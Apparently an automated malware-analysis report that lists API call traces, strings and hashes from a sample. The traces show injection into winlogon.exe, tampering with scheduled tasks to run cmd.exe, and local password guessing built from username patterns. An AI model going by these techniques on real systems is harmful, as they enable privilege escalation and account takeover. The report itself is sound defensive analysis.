                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                              • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004017D8
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
APIs
• GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
• GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
• OpenProcessToken.ADVAPI32(00000000), ref: 00403510
• GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
• CloseHandle.KERNEL32(00000000), ref: 00403547
Strings
• \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
Memory Dump Source
• Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmp
Yara matches
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
• String ID: \\?\globalroot\systemroot\system32\tasks\
• API String ID: 4133869067-1576788796
Strings
Memory Dump Source
• Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmp
Yara matches
Similarity
• API ID:
• String ID: VUUU
• API String ID: 0-2040033107
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                            • Instruction ID: 0e2bac03be3182a769e9f59211ddb04f7312f67a2832feff6941ae3a6f9bab68
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9002F730A007459FEB24CF18C490AAFB7F1FF41715F14855AE8A68B391D738AE86CB65
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                            • Instruction ID: 647bc1efc872d410d83d31efe28936287375966dcf2aa8afc27d93c91c757f48
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6102F530A017459FEB24CF18C4906AFB7F1FF91711F14855AE8A58B391D338AE96C794
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                            • Instruction ID: 5041421aec073d2b688b2073802020d7c79b1bca3df2cb6ef25812ac66b41e1f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA02D430A017459FEB24CF18C590AAFB7F1FF91310F14855AE8A65B3A1D738AD82C7A5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                            • Instruction ID: a657eec15ca3c5bb160301247c07cdb44cfdd935969e5cbf472f05e5335aa939
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6F19E71A00619ABDB20CF98C980BAFB7A5EF89314F10417EED05A7382D779DD41CBA5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                            • Instruction ID: 1bcbb60a4870fb6f7824f06d04ae27aaebc780d04162e94b05afeb65d1883275
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94124A71E002198FCF18CF99C9906AEFBF2FF88314F18916AD859AB754D738A941CB54
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                            • Instruction ID: f2c5ae519af86c61090003759672b7809cd436e53f2fd5b45b2c1165b140046f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAE12A309417859FFB25CF28C4906AEBBF1EF52310F1882AFD5E55B392C238A956C758
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                            • Instruction ID: 3d5b5479c895319a2c4470d34a8ff6393b73061c9a225c3785347aa2e70d1fa5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DE10330E045458FDB08CF68C9806ADBBF3EF89310B28C1AED495DB346D639EA46CB55
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                            • Instruction ID: 8b1a689c82d0fe3ee89c344c2f7eab184c0c6edd59e3ba46ea3345da4373e9f6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1ED13576E0021A8FCB18CF99C9815AEFBB2FF98310F25956AD815BB704D734A911CF94
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                            • Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                            • String ID: 00-->$<Actions
                                                                                                                                                                                                            • API String ID: 3028510665-1934172683
                                                                                                                                                                                                            • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                            • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,?,76A8DB30), ref: 00403060
                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                              • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                              • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                              • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                            • String ID: cmd.exe
                                                                                                                                                                                                            • API String ID: 2839743307-723907552
                                                                                                                                                                                                            • Opcode ID: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                            • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76A8DB30), ref: 00401EC6
                                                                                                                                                                                                            • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76A8DB30), ref: 00401EE2
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                            • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                            • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                            • String ID: %s1$%s12$%s123
                                                                                                                                                                                                            • API String ID: 1588441251-2882894844
